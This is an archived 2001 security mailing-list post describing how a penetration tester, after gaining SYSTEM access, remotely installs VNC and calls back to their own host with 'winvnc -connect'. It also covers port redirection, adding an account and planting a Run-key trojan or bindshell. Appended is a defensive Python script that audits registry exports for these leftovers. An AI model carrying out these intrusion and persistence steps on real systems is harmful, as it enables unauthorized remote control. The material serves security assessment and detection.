On Sunday 16 September 2001 04:18 pm, Rainer Duffner wrote:
> Hi,

[ snip ]

> Even with hk.exe, NET USE fails. Is there an explanation?

One strategy for getting an interactive network session is to install VNC
remotely and send yourself back a desktop. The basic steps:

1. Get SYSTEM privs.

2. Copy winvnc.exe, vnchooks.dll, and omnithread_rt.dll to c:\winnt\system32

3. Use reg.exe, regini.exe, or regedit (NT 4.0 only) to load the default
   registry settings, including the password to use. You can create one of
   these by setting up VNC on a local machine and dumping the registry tree.

4. Run vncviewer -listen on a machine that the target box can reach on port
   5500. For hardcore firewalled environments you can redirect ports with
   fpipe, netcat, or ssh -R/-L.

5. Execute winvnc -install, then net start winvnc, and finally
   winvnc -connect <yourip>, type in your password and use the desktop.

6. If an Admin is logged on, the game is over, you have his/her privs. If you
   get a logon prompt, go create a user account then login with it ;)

You can also add a trojan to the registry Run keys, the startup folder, or the
network logon scripts. Ideally this trojan would drop a bindshell running in
the context of the user.

Also, please be sure to _remove_ any trojans or VNC services you install;
there's no point in paying for a security assessment/pen-test if you are worse
off than when you started.

If anyone needs help getting the VNC setup going, email me; if enough people
ask I will put up a tutorial...

--
H D Moore
http://www.digitaldefense.net - work
http://www.digitaloffense.net - play

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
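Added example, not part of H D Moore's post: the cleanup and detection side of the procedure above. It audits a Windows .reg export for the artifacts steps 3 and 5 and the Run-key trojan leave behind (a service whose ImagePath runs winvnc.exe, and Run/RunOnce autostart entries), using the standard Services and CurrentVersion\Run key paths; the sample export is constructed, not taken from a real host.

```python
import re

# Constructed sample .reg export (not from any real host). The "Updater"
# autostart and the winvnc service are the kind of leftovers the post
# warns assessors to remove.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Updater"="C:\\WINNT\\system32\\svc.exe"
"VMwareTray"="C:\\Program Files\\VMware\\VMwareTray.exe"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\winvnc]
"ImagePath"="C:\\WINNT\\system32\\WinVNC.exe -service"
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Spooler]
"ImagePath"="C:\\WINNT\\system32\\spoolsv.exe"
"""

_KEY = re.compile(r"^\[(.+)\]$")
_VALUE = re.compile(r'^(?:"([^"]+)"|(@))=(.*)$')

def parse_reg(text):
    """Parse a .reg export into {key: {value_name: value}}. Quoted REG_SZ
    strings are unescaped; other types (dword:, hex:) keep their raw text."""
    keys, current = {}, None
    for line in text.splitlines():
        m = _KEY.match(line.strip())
        if m:
            current = keys.setdefault(m.group(1), {})
            continue
        m = _VALUE.match(line.strip())
        if m and current is not None:
            name = m.group(1) or "(Default)"
            raw = m.group(3)
            if raw.startswith('"') and raw.endswith('"'):
                raw = raw[1:-1].replace('\\\\', '\\').replace('\\"', '"')
            current[name] = raw
    return keys

def find_autostarts(keys):
    """Every Run/RunOnce entry; each is a persistence point to review."""
    return [(k, n, v) for k, vals in keys.items()
            if k.lower().endswith(("\\currentversion\\run",
                                   "\\currentversion\\runonce"))
            for n, v in vals.items()]

def find_vnc_services(keys):
    """Service names whose ImagePath launches winvnc.exe (winvnc -install)."""
    return [k.rsplit("\\", 1)[-1] for k, vals in keys.items()
            if "\\services\\" in k.lower()
            and "winvnc.exe" in vals.get("ImagePath", "").lower()]

def audit(text):
    keys = parse_reg(text)
    return {"autostarts": find_autostarts(keys),
            "vnc_services": find_vnc_services(keys)}
```

Run it against an export taken with `regedit /e` (or reg.exe) before and after an engagement and diff the two results; anything new in either list is something to explain or remove.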
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 14:17:48 PDT